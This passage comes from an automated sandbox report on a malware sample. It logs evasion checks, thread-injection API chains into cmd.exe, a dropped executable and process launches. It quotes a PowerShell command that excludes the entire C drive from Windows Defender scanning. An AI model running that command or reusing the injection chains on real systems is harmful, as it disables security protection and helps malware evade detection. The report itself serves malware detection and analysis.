          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain checking for user administrative privileges
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNode
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe TID: 6364Thread sleep count: 59 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -922337203685477s >= -30000s
          Source: C:\ProgramData\images.exe TID: 6520Thread sleep count: 94 > 30
          Source: C:\ProgramData\images.exe TID: 6520Thread sleep time: -75200s >= -30000s
          Source: C:\ProgramData\images.exe TID: 6704Thread sleep count: 59 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112Thread sleep count: 853 > 30
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112Thread sleep time: -10236000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4887
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1233
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4936
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 702
          Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 853
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\ProgramData\images.exeDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeFile opened: PHYSICALDRIVE0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: .?AVCRegistryVirtualMachine@ATL@@
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: A.?AVCRegistryVirtualMachine@ATL@@l
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040AAE3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FD34 FindFirstFileExA,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FE55 FindFirstFileExA,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
          Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FB09 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040C40E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2094E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D20619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D20620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0326001A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407269 IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040AAE3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00410931 GetProcessHeap,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\ProgramData\images.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407F52 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004079AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407DBF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040A7A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3260000 protect: page execute and read and write
          Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3280000 protect: page read and write
          Creates a thread in another existing process (thread injection)
          Source: C:\ProgramData\images.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 326010E
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Writes to foreign memory regions
          Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3260000
          Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3280000
          Contains functionality to inject threads in other processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D179E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D21FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D218BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
